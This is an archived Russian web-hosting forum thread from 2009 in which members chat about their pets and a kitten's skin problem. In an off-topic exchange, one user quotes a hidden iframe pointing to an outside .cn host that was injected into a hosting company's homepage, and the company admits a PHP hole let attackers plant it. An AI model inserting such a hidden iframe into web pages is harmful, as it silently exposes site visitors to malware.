Помощь - Поиск - Пользователи - Календарь
Полная версия: Наши домашние живёлы ))
Онлайн-форум hostobzor.ru > Архив (темы до 1.06.2015). Только для чтения. > Коммерческий хостинг. Общие форумы > Флейм
Roman Hirauka
Какие у вас дома есть питомцы? У меня был стаффордширский терьер, давно уже как умер. Долгое время никого не было. 3 дня назад, зашел с другом пивка попить в кафешку по дороге домой. Сидим, разговаривам. Слышу под столом мяуканье. Смотрю, котёнок. Я без раздумий забрал его к себе... Оказался очень умным. Сразу же приучился к туалету, не носится и не мешает. Весь чёрный, ни одного даже пятнышка нигде - как смоль.
Считает, наверное, меня своей мамкой, спит только со мной. Спать не мешает, как ни странно. Очень толковый попался, взгляд даже умный...
Ненарадуюсь на своего катейку smile.gif
ural1983
Аллергия позволила только морскую свинку - дерис smile.gif
Admin
Цитата(Roman Hirauka @ 19.06.2009, 01:34) *

Очень толковый попался, взгляд даже умный...

У меня есть приятель (не из самых нуждающихся, скажем так, мог бы себе позволить призера любой кошачей выставки). Но всегда берет себе кошек только уличных ("помоечных", как он их называет). Во-первых, породистые и так пристроены. А главное, что они самые сообразительные, по его мнению, т.к. в борьбе за выживание вынуждены оттачивать свой интеллект, мозги жиром не заплывают, как у породистых "диванных".

А у меня самого - Джек. Но он не домашний, живет на улице, в своей будке, в дом и палкой не загонишь... Любит свободу и ненавидит жару.
lazutov
а вот мне не повезло.
Очень люблю живность всякую(живность меня тоже любит), только у меня жуткая аллергия на почти любую шерсть и даже рыбок.
sad.gif
xaker1
У меня дома рыбки и кот.
Рыбки, к сожалению болеют. Гуппи, неоны, тетра-фонарик и сомы. Больше всего Гуппи, они постоянно плодятся))
Кот умный, живет уже давно. Живет "на три дома". Тоесть питается у двоих соседей постоянно, а так же иногда другие подкармливают.
A-l-e-X
есть рыбки
есть собачка - кане корсо
Partizansk Telecom
Цитата(A-l-e-X @ 19.06.2009, 16:59) *

есть рыбки

+1 smile.gif уже около 8 лет рыбки, большой аквариум в стенке.

Раньше когда в своём доме с родителями жил чего только не было... smile.gif
Forkast
Были и рыбки(меченосцы, гупии, пара золотых рыбок)
Был и кошак.. Котов страсть как люблю, мать против того, чтобы завести еще кошака. Вот будет своя хата - заведу себе дормоеда xD
ComfoPlace.com
Пятнистый породистый такс smile.gif
Предпочитаю собак как домашних животных smile.gif
P.S: Норы только постоянно ищет. А если их нет - он их делает :-P
different
Две кошки smile.gif
AbcHost
3 змеи, 4 паука, 9 хорьков, кот, собака, улитки, сцинк, сахарные поссумы (пара), тараканы трех видов ...
Roman Hirauka
Я смотрю тут у некоторых зоопарк можно открывать... Блин, у котейки моего что-то за ушком. Сначало там была коросточка тёмная, как после заживления ранки, теперь вроде как отвалилась (или разодрал), но крови вроде нет, просто нету шерсти, белая кожа, ну так коппилярчики просвечиваются... Вот думаю ни лишай ли это. На выходных ветлечебница не работает. Звонил ветеринару знакомому, говорит так не скажешь, смотреть надо... Короче, на стрёме я. Кто-нибудь может что по этому поводу сказать, кошек много кто держит.
Ru-hoster.Com
Цитата(AbcHost @ 20.06.2009, 00:22) *

3 змеи, 4 паука, 9 хорьков, кот, собака, улитки, сцинк, сахарные поссумы (пара), тараканы трех видов ...

Да к вам экскурсии можно водить!

У самого попугайчик. Девочка. Зовут Петя.
Умное животное. Когда что-то хочет, начинает громко ругаться на своем языке. Так громко, что через пару минут получает желанное.

А еще очень люблю кошек. Только не больших, толстых и ленивых.
Когда-то, когда в своем доме жил, была кошлка - Маня. Жутко умная.
О ней можно многое рассказать. Как то окатилась под машиной. И потом утром, когда нужно было ехать, проводила эвакуацию котят. Или как учила котяток охотиться. Поймала мышь, доставила на место дислокации котят, и не давала убежать, постоянно подталкивая бедную мышку назад к котятам лапой. Это было вообще так забавно. Жалко, что сейчас не позволяют условия завести кошку. smile.gif

Цитата(Roman Hirauka @ 20.06.2009, 00:30) *

Блин, у котейки моего что-то за ушком. Сначало там была коросточка тёмная, как после заживления ранки, теперь вроде как отвалилась (или разодрал), но крови вроде нет, просто нету шерсти, белая кожа, ну так коппилярчики просвечиваются... Вот думаю ни лишай ли это. На выходных ветлечебница не работает. Звонил ветеринару знакомому, говорит так не скажешь, смотреть надо... Короче, на стрёме я. Кто-нибудь может что по этому поводу сказать, кошек много кто держит.

Роман. Вот.

Цитата
Стригущий лишай - это инфекционное заболевание. Оно вызывается дерматофитами - особый вид грибка. Это заболевание начинается с того, что концы волос у больного животного начинают рассекаться и в последствии закручиваться. После этого на коже больного животного образуются серого цвета корка. Чаща (наверное - чаще smile.gif ) всего при этом заболевании поражается кожа шеи, головы и конечностей. Даже при самом небольшом, надавливании на корку болячки, выделяется гной. Постепенно одиночные очаги соединяются в большие участки поражения. При лишае, больные животные, никогда не чешутся.

И не такое видели. Без паники. smile.gif
Roman Hirauka
А чего мне паниковать. Это умерянная настороженность. Я больше за котейку переживаю, чем боюсь чем-нибудь заразиться. Не всегда лишаем человек заболеет, всё зависит от иммунитета...
Звонил ветеринару, всё описал, сказал чтобы я не волновался, всё нормально. Не сильно я конечно верю, что по телефону можно поставить диагноз, но всё же успокоил smile.gif
Ru-hoster.Com
Цитата(Roman Hirauka @ 20.06.2009, 02:51) *

Звонил ветеринару, всё описал, сказал чтобы я не волновался, всё нормально. Не сильно я конечно верю, что по телефону можно поставить диагноз, но всё же успокоил smile.gif

Можно было выслать фотку почтой smile.gif
KMUA
унылый топик без фоток....

Изображение
Roman Hirauka
Я всё думал, как своего назвать... Прихожу домой, тискаю его, то демоном называл, то змеем и т.д. Потом смотрю, чёрный такой бандит, думаю на бэтмана похож. Так и назвал - Бэтман biggrin.gif
KMUA
А у меня такой лол был. Лет 8 назад принес котенка (свеху не он), назвали Барсиком. Через пару месяцев выяснилось что это не он а "она" =) Переименовали в Басю =)))))))
Roman Hirauka
Это мелочи. Мне мать рассказывала, что когда она жила с родителями в Хабаровске, у них был кот Кузя. Прожил он у них лет 6-7. Когда они уезжали из Хабаровска в Беларусь, кота оставили друзьям. Через несколько месяцев получили письмо из Хабаровска "Ваш кот Кузя родил 6-х котят" smile.gif
lazutov
Цитата(Roman Hirauka @ 20.06.2009, 20:14) *

унылый топик без фоток....

такой серьезный smile.gif
как и хозяин может быть?
xaker1
Цитата(Roman Hirauka @ 20.06.2009, 20:52) *
Через несколько месяцев получили письмо из Хабаровска "Ваш кот Кузя родил 6-х котят" smile.gif

Представляю их лицо, когда они прочитали))
А вообще, я не понимаю, как кота с кошкой можно перепутать.
lazutov
Цитата
А вообще, я не понимаю, как кота с кошкой можно перепутать.

Мне еще со школы помнится, что после вполне стандартных для ветеринарии процедур можно.
Roman Hirauka
Какие процеДУРЫ? Кот был сибирский, очень пушистый просто...
Roman Hirauka
Котейку свозил к ветеринару. Всё нормально, здоров. Бандитствует у меня, полюбил клавиатуру тискать, иногда в аське за меня отправляет сообщения вроде "шгн89фцупалордфывг7ащшфыу8пол". Буду учить печатать smile.gif
LexaDstyle
у меня вчера собака родила аж пять рыл приколы такие жесть поздравьте меня biggrin.gif

Roman Hirauka
Кто же тебя родил, лучше скажи, поржали бы вместе.
KMUA
Продолжаем...
Родичи уехали отдыхать и оставили нам попугая Жору. А кошке понравилась его клетка tongue.gif Изображение
ComfoPlace.com
KMUA
Клас... Поменялись местами :-D
HostGet Ltd
У меня есть кот - Яндекс.
И собака...
xaker1
HostGet Ltd, а собаку как зовут? Гугль?))
HostGet Ltd
Цитата(xaker1 @ 27.06.2009, 15:49) *

HostGet Ltd, а собаку как зовут? Гугль?))

Не...Собака была на много раньше, чем я занялся СЕО. Поэтому собаку зовут "Гиза".
xaker1
[офтоп]
HostGet Ltd, при заходе на ваш сайт avast! ругается на вирус.
Вот информация:
url: http://www.hostget.ru/\{gzip}
Имя вируса: HTML:Iframe-inf
Тип: Вирус/Червь
Версия VPS: 090626-0, 26.06.2009
[/офтоп]
different
Цитата(xaker1 @ 27.06.2009, 20:39) *

[офтоп]
HostGet Ltd, при заходе на ваш сайт avast! ругается на вирус.
Вот информация:
url: http://www.hostget.ru/\{gzip}
Имя вируса: HTML:Iframe-inf
Тип: Вирус/Червь
Версия VPS: 090626-0, 26.06.2009
[/офтоп]

Код
<iframe src="http://yourlotcar.cn:8080/index.php" width=138 height=107 style="visibility: hidden"></iframe>

А вот и код с главной.
WebXL
У меня была кошка, Марго:
Изображение

Изображение

Несколько раз предпринимались попытки взять еще котенка из тех, что брошены на улице, но кошка не принимала, ругалась и грозилась разорвать. А вот месяца три назад, снова попробовали взять котенка и на удивление приняла. Котенок оказался жутко умным и жутко ласковым. Потом кошка умерла sad.gif А потом котенок исчез (ушел гулять и нет его уже недели две), вероятно до этого на улице его кошка защищала и приняла наверное потому-что чувствовала, что отжила свое (ей лет 12-13 было, заболела она).

Сейчас пока никого нет, не знаю стоит ли кого заводить. Подумываю о декоративном кролике.
HostGet Ltd
Цитата(different @ 27.06.2009, 19:26) *

Код
<iframe src="http://yourlotcar.cn:8080/index.php" width=138 height=107 style="visibility: hidden"></iframe>

А вот и код с главной.

Ага, есть такая бЯда...
Из-за "дыры" в php на сервер идут атаки и вставляют вредоносный код.
Админы работают над этим.

Извените за оффтоп.
umho.ru
А я считаю что аквариумные рыбки это самые "удобные" домашние животные, кушают немного, не шумят, мимо аквариума не гадят.И вечером приятно, сидя у монитора смотреть как с лева от него, в аквариуме, играют рыбки и ползают аквариумные улитки smile.gif
eSupport.org.ua
Зато надо воду менять - это целый ритуал
У самого в детстве был аквариум на 250л
Vitalik
А мы с подругой этот Новый год отмечали в деревне, жили там пять дней - и к нам два котенка прибились, жили с нами smile.gif Когда пора было ехать домой - подруга не смогла с ними расстаться, забрали их в город - думали, отдадим кому-нибудь, а в итоге так они с нами и остались жить smile.gif Одного еще в НГ почему-то назвали Родион, и я решил, что второй котенок тогда должен быть GeForce'ом - сокращенно Джеф smile.gif)) А через пару месяцев выяснилось, что Джеф - кошка, а не кот, пришлось переименовать в Джесс smile.gif))

Изображение

А сейчас жизнь сложилась так, что снова живу с родителями, и со своим родным котом Барсиком, которого взяли у какой-то бабули еще лет 12-13 назад smile.gif

Изображение
KMUA
Кстати, насчет деревни

Изображение
Ru-hoster.Com
KMUA, очень мило smile.gif
У меня тут открылся аэропорт на подоконнике. Голуби уже подросли, и учатся летать. Не долетают - часто, приходится выполнять экстренную посадку на мой подоконник smile.gif

А сейчас был вообще интересный случай. Прилетел голубь - дете, а за ним его мамашка. Голубь меня не боится (я там за окном долблюсь в думках - что за дела smile.gif - не сразу понял), а мать его боится жуть - но не улетает... очень мило.
LexaDstyle
у меня собачка пекинес родила на прошлой неделе 5 щенков такие классные жаль фото нету

------------------
Сейчас можно купить пеноблок разного качества по одной и той же цене

у меня собачка пекинес родила на прошлой неделе 5 щенков такие классные жаль фото нету

------------------
Сейчас можно купить пеноблок разного качества по одной и той же цене
Это текстовая версия — только основной контент. Для просмотра полной версии этой страницы, пожалуйста, нажмите сюда.
Русская версия Invision Power Board © 2001-2025 Invision Power Services, Inc.